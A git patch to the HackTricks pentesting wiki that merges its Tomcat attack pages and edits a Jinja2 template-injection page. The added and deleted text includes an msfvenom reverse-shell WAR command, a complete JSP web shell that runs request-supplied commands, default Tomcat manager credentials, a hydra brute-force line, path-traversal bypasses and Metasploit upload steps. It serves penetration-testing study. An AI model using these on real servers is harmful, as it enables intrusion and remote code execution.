From b3ead6982190b7a56560ee93c684c7a6570718ee Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 12 Dec 2024 00:29:39 +0000 Subject: [PATCH] GITBOOK-4443: No subject --- SUMMARY.md | 3 +- .../pentesting-web/README.md | 18 +- .../pentesting-web/tomcat.md | 43 ++- .../pentesting-web/tomcat/README.md | 278 ------------------ .../tomcat/basic-tomcat-info.md | 169 ----------- .../jinja2-ssti.md | 14 +- 6 files changed, 48 insertions(+), 477 deletions(-) delete mode 100644 network-services-pentesting/pentesting-web/tomcat/README.md delete mode 100644 network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md diff --git a/SUMMARY.md b/SUMMARY.md index 7c6a57f4cd5..c418f53a1c8 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -430,8 +430,7 @@ * [Source code Review / SAST Tools](network-services-pentesting/pentesting-web/code-review-tools.md) * [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md) * [Symfony](network-services-pentesting/pentesting-web/symphony.md) - * [Tomcat](network-services-pentesting/pentesting-web/tomcat/README.md) - * [Basic Tomcat Info](network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md) + * [Tomcat](network-services-pentesting/pentesting-web/tomcat.md) * [Uncovering CloudFlare](network-services-pentesting/pentesting-web/uncovering-cloudflare.md) * [VMWare (ESX, VCenter...)](network-services-pentesting/pentesting-web/vmware-esx-vcenter....md) * [Web API Pentesting](network-services-pentesting/pentesting-web/web-api-pentesting.md) diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md index 3e6ab65e8d4..f8ab8910f6a 100644 --- a/network-services-pentesting/pentesting-web/README.md +++ b/network-services-pentesting/pentesting-web/README.md @@ -9,13 +9,13 @@ Learn & practice GCP Hacking: Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. {% endhint %} -
+
**Get a hacker's perspective on your web apps, network, and cloud** @@ -104,7 +104,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno * [**H2 - Java SQL database**](h2-java-sql-database.md) * [**IIS tricks**](iis-internet-information-services.md) * [**JBOSS**](jboss.md) -* [**Jenkins**]([https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/pentesting-web/broken-reference/README.md](https://github.com/HackTricks-wiki/hacktricks-cloud/tree/master/pentesting-ci-cd/jenkins-security)) +* [**Jenkins**](\[https:/github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/pentesting-web/broken-reference/README.md]\(https:/github.com/HackTricks-wiki/hacktricks-cloud/tree/master/pentesting-ci-cd/jenkins-security\)/) * [**Jira**](jira.md) * [**Joomla**](joomla.md) * [**JSP**](jsp.md) @@ -115,7 +115,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno * [**Python**](python.md) * [**Spring Actuators**](spring-actuators.md) * [**Symphony**](symphony.md) -* [**Tomcat**](tomcat/) +* [**Tomcat**](tomcat.md) * [**VMWare**](vmware-esx-vcenter....md) * [**Web API Pentesting**](web-api-pentesting.md) * [**WebDav**](put-method-webdav.md) @@ -161,7 +161,7 @@ node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi If a CMS is used don't forget to **run a scanner**, maybe something juicy is found: -[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\ +[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat.md)**, Railo, Axis2, Glassfish**\ [**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/), **Joomla**, **vBulletin** websites for Security issues. (GUI)\ [**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/)**, PrestaShop, Opencart**\ **CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/) **or** [**(M)oodle**](moodle.md)\ @@ -278,7 +278,7 @@ Tools: **Recommended dictionaries:** -* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt) +* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt](https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/bf_directories.txt) * [**Dirsearch** included dictionary](https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt) * [http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10](http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10) * [Assetnote wordlists](https://wordlists.assetnote.io) @@ -362,14 +362,14 @@ Now that a comprehensive enumeration of the web application has been performed i Find more info about web vulns in: * [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist) -* [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html) +* [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html) * [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection) ### Monitor Pages for changes You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities. -
+
**Get a hacker's perspective on your web apps, network, and cloud** @@ -458,7 +458,7 @@ Learn & practice GCP Hacking: Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/network-services-pentesting/pentesting-web/tomcat.md b/network-services-pentesting/pentesting-web/tomcat.md index a5e46cae3cc..4806c198cb7 100644 --- a/network-services-pentesting/pentesting-web/tomcat.md +++ b/network-services-pentesting/pentesting-web/tomcat.md @@ -1,15 +1,15 @@ # Tomcat {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
@@ -20,7 +20,7 @@ Learn & practice GCP Hacking:
+
## Enumeration @@ -156,7 +156,7 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit 1. Create the war to deploy: ```bash -msfvenom -p java/shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war +msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war ``` 2. Upload the `revshell.war` file and access to it (`/revshell/`): @@ -239,17 +239,32 @@ zip -r backup.war cmd.jsp ## POST -Name of Tomcat credentials file is _tomcat-users.xml_ +Name of Tomcat credentials file is `tomcat-users.xml` and this file indicates the role of the user inside tomcat. ```bash find / -name tomcat-users.xml 2>/dev/null ``` -Other ways to gather Tomcat credentials: - -```bash -msf> use post/multi/gather/tomcat_gather -msf> use post/windows/gather/enum_tomcat +Example: + +```xml +[...] + +[...] + + + + ``` ## Other tomcat scanning tools @@ -262,15 +277,15 @@ msf> use post/windows/gather/enum_tomcat * [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf) {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/network-services-pentesting/pentesting-web/tomcat/README.md b/network-services-pentesting/pentesting-web/tomcat/README.md deleted file mode 100644 index dc47450f449..00000000000 --- a/network-services-pentesting/pentesting-web/tomcat/README.md +++ /dev/null @@ -1,278 +0,0 @@ -# Tomcat - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Discovery - -* It usually runs on **port 8080** -* **Common Tomcat error:** - -
- -## Enumeration - -### **Version Identification** - -To find the version of Apache Tomcat, a simple command can be executed: - -```bash -curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat -``` - -This will search for the term "Tomcat" in the documentation index page, revealing the version in the title tag of the HTML response. - -### **Manager Files Location** - -Identifying the exact locations of **`/manager`** and **`/host-manager`** directories is crucial as their names might be altered. A brute-force search is recommended to locate these pages. - -### **Username Enumeration** - -For Tomcat versions older than 6, it's possible to enumerate usernames through: - -```bash -msf> use auxiliary/scanner/http/tomcat_enum -``` - -### **Default Credentials** - -The **`/manager/html`** directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being: - -* admin:admin -* tomcat:tomcat -* admin: -* admin:s3cr3t -* tomcat:s3cr3t -* admin:tomcat - -These credentials can be tested using: - -```bash -msf> use auxiliary/scanner/http/tomcat_mgr_login -``` - -Another notable directory is **`/manager/status`**, which displays the Tomcat and OS version, aiding in vulnerability identification. - -### **Brute Force Attack** - -To attempt a brute force attack on the manager directory, one can use: - -```bash -hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html -``` - -Along with setting various parameters in Metasploit to target a specific host. - -## Common Vulnerabilities - -### **Password Backtrace Disclosure** - -Accessing `/auth.jsp` may reveal the password in a backtrace under fortunate circumstances. - -### **Double URL Encoding** - -The CVE-2007-1860 vulnerability in `mod_jk` allows for double URL encoding path traversal, enabling unauthorized access to the management interface via a specially crafted URL. - -In order to access to the management web of the Tomcat go to: `pathTomcat/%252E%252E/manager/html` - -### /examples - -Apache Tomcat versions 4.x to 7.x include example scripts that are susceptible to information disclosure and cross-site scripting (XSS) attacks. These scripts, listed comprehensively, should be checked for unauthorized access and potential exploitation. Find [more info here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/) - -* /examples/jsp/num/numguess.jsp -* /examples/jsp/dates/date.jsp -* /examples/jsp/snp/snoop.jsp -* /examples/jsp/error/error.html -* /examples/jsp/sessions/carts.html -* /examples/jsp/checkbox/check.html -* /examples/jsp/colors/colors.html -* /examples/jsp/cal/login.html -* /examples/jsp/include/include.jsp -* /examples/jsp/forward/forward.jsp -* /examples/jsp/plugin/plugin.jsp -* /examples/jsp/jsptoserv/jsptoservlet.jsp -* /examples/jsp/simpletag/foo.jsp -* /examples/jsp/mail/sendmail.jsp -* /examples/servlet/HelloWorldExample -* /examples/servlet/RequestInfoExample -* /examples/servlet/RequestHeaderExample -* /examples/servlet/RequestParamExample -* /examples/servlet/CookieExample -* /examples/servlet/JndiServlet -* /examples/servlet/SessionExample -* /tomcat-docs/appdev/sample/web/hello.jsp - -### **Path Traversal Exploit** - -In some [**vulnerable configurations of Tomcat**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) you can gain access to protected directories in Tomcat using the path: `/..;/` - -So, for example, you might be able to **access the Tomcat manager** page by accessing: `www.vulnerable.com/lalala/..;/manager/html` - -**Another way** to bypass protected paths using this trick is to access `http://www.vulnerable.com/;param=value/manager/html` - -## RCE - -Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**. - -### Limitations - -You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](./#post)section). - -```bash -# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed - -# deploy under "path" context path -curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell" - -# undeploy -curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell" -``` - -### Metasploit - -```bash -use exploit/multi/http/tomcat_mgr_upload -msf exploit(multi/http/tomcat_mgr_upload) > set rhost -msf exploit(multi/http/tomcat_mgr_upload) > set rport -msf exploit(multi/http/tomcat_mgr_upload) > set httpusername -msf exploit(multi/http/tomcat_mgr_upload) > set httppassword -msf exploit(multi/http/tomcat_mgr_upload) > exploit -``` - -### MSFVenom Reverse Shell - -1. Create the war to deploy: - -```bash -msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war -``` - -2. Upload the `revshell.war` file and access to it (`/revshell/`): - -### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer) - -In some scenarios this doesn't work (for example old versions of sun) - -#### Download - -```bash -git clone https://github.com/mgeeky/tomcatWarDeployer.git -``` - -#### Reverse shell - -```bash -./tomcatWarDeployer.py -U -P -H -p :/manager/html/ -``` - -#### Bind shell - -```bash -./tomcatWarDeployer.py -U -P -p :/manager/html/ -``` - -### Using [Culsterd](https://github.com/hatRiot/clusterd) - -```bash -clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows -``` - -### Manual method - Web shell - -Create **index.jsp** with this [content](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp): - -```java -
- - -
-<%@ page import="java.io.*" %> -<% - String cmd = request.getParameter("cmd"); - String output = ""; - if(cmd != null) { - String s = null; - try { - Process p = Runtime.getRuntime().exec(cmd,null,null); - BufferedReader sI = new BufferedReader(new -InputStreamReader(p.getInputStream())); - while((s = sI.readLine()) != null) { output += s+"
"; } - } catch(IOException e) { e.printStackTrace(); } - } -%> -
<%=output %>
-``` - -```bash -mkdir webshell -cp index.jsp webshell -cd webshell -jar -cvf ../webshell.war * -webshell.war is created -# Upload it -``` - -You could also install this (allows upload, download and command execution): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html) - -### Manual Method 2 - -Get a JSP web shell such as [this](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) and create a WAR file: - -```bash -wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp -zip -r backup.war cmd.jsp -# When this file is uploaded to the manager GUI, the /backup application will be added to the table. -# Go to: http://tomcat-site.local:8180/backup/cmd.jsp -``` - -## POST - -Name of Tomcat credentials file is _tomcat-users.xml_ - -```bash -find / -name tomcat-users.xml 2>/dev/null -``` - -Other ways to gather Tomcat credentials: - -```bash -msf> use post/multi/gather/tomcat_gather -msf> use post/windows/gather/enum_tomcat -``` - -## Other tomcat scanning tools - -* [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner) - -## References - -* [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat) -* [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf) - - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md deleted file mode 100644 index ef2af059f3b..00000000000 --- a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md +++ /dev/null @@ -1,169 +0,0 @@ -# Basic Tomcat Info - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Avoid to run with root - -In order to not run Tomcat with root a very common configuration is to set an Apache server in port 80/443 and, if the requested path matches a regexp, the request is sent to Tomcat running on a different port. - -### Default Structure - -``` -β”œβ”€β”€ bin -β”œβ”€β”€ conf -β”‚ β”œβ”€β”€ catalina.policy -β”‚ β”œβ”€β”€ catalina.properties -β”‚ β”œβ”€β”€ context.xml -β”‚ β”œβ”€β”€ tomcat-users.xml -β”‚ β”œβ”€β”€ tomcat-users.xsd -β”‚ └── web.xml -β”œβ”€β”€ lib -β”œβ”€β”€ logs -β”œβ”€β”€ temp -β”œβ”€β”€ webapps -β”‚ β”œβ”€β”€ manager -β”‚ β”‚ β”œβ”€β”€ images -β”‚ β”‚ β”œβ”€β”€ META-INF -β”‚ β”‚ └── WEB-INF -| | └── web.xml -β”‚ └── ROOT -β”‚ └── WEB-INF -└── work - └── Catalina - └── localhost -``` - -* The `bin` folder stores scripts and binaries needed to start and run a Tomcat server. -* The `conf` folder stores various configuration files used by Tomcat. -* The `tomcat-users.xml` file stores user credentials and their assigned roles. -* The `lib` folder holds the various JAR files needed for the correct functioning of Tomcat. -* The `logs` and `temp` folders store temporary log files. -* The `webapps` folder is the default webroot of Tomcat and hosts all the applications. The `work` folder acts as a cache and is used to store data during runtime. - -Each folder inside `webapps` is expected to have the following structure. - -``` -webapps/customapp -β”œβ”€β”€ images -β”œβ”€β”€ index.jsp -β”œβ”€β”€ META-INF -β”‚ └── context.xml -β”œβ”€β”€ status.xsd -└── WEB-INF - β”œβ”€β”€ jsp - | └── admin.jsp - └── web.xml - └── lib - | └── jdbc_drivers.jar - └── classes - └── AdminServlet.class -``` - -The most important file among these is `WEB-INF/web.xml`, which is known as the deployment descriptor. This file stores **information about the routes** used by the application and the classes handling these routes.\ -All compiled classes used by the application should be stored in the `WEB-INF/classes` folder. These classes might contain important business logic as well as sensitive information. Any vulnerability in these files can lead to total compromise of the website. The `lib` folder stores the libraries needed by that particular application. The `jsp` folder stores [Jakarta Server Pages (JSP)](https://en.wikipedia.org/wiki/Jakarta\_Server\_Pages), formerly known as `JavaServer Pages`, which can be compared to PHP files on an Apache server. - -Here’s an example **web.xml** file. - -```xml - - - - - - - AdminServlet - com.inlanefreight.api.AdminServlet - - - - AdminServlet - /admin - - -``` - -The `web.xml` configuration above defines a **new servlet named `AdminServlet`** that is mapped to the **class `com.inlanefreight.api.AdminServlet`**. Java uses the dot notation to create package names, meaning the path on disk for the class defined above would be: - -* **`classes/com/inlanefreight/api/AdminServlet.class`** - -Next, a new servlet mapping is created to **map requests to `/admin` with `AdminServlet`**. This configuration will send any request received for **`/admin` to the `AdminServlet.class`** class for processing. The **`web.xml`** descriptor holds a lot of **sensitive information** and is an important file to check when leveraging a **Local File Inclusion (LFI) vulnerability**. - -### tomcat-users - -The **`tomcat-users.xml`** file is used to **allow** or disallow access to the **`/manager` and `host-manager` admin pages**. - -```xml - - - - - - - - - - -!-- user manager can access only manager section --> - - - - - - - - - -``` - -The file shows us what each of the roles `manager-gui`, `manager-script`, `manager-jmx`, and `manager-status` provide access to. In this example, we can see that a user `tomcat` with the password `tomcat` has the `manager-gui` role, and a second weak password `admin` is set for the user account `admin` - -## References - -* [https://academy.hackthebox.com/module/113/section/1090](https://academy.hackthebox.com/module/113/section/1090) - - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md b/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md index 9d1bb120979..e6e7fd87dee 100644 --- a/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md +++ b/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md @@ -9,13 +9,13 @@ Learn & practice GCP Hacking: Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. {% endhint %} -
+
Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: @@ -57,6 +57,7 @@ If the Debug Extension is enabled, a `debug` tag will be available to dump the c + ``` @@ -78,6 +79,7 @@ Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement] + ``` ## **Jinja Injection** @@ -143,6 +145,7 @@ dict.__mro__[-1] + # Not sure if this will work, but I saw it somewhere {{ [].class.base.subclasses() }} {{ ''.class.mro()[1].subclasses() }} @@ -228,6 +231,7 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi + ``` * [**Return here for more options to access a global object**](jinja2-ssti.md#accessing-global-objects) @@ -277,6 +281,7 @@ Without **`{{`** **`.`** **`[`** **`]`** **`}}`** **`_`** + ``` ## Jinja Injection without **\** @@ -372,8 +377,7 @@ The request will be urlencoded by default according to the HTTP format, which ca Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
+ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: @@ -384,7 +388,7 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.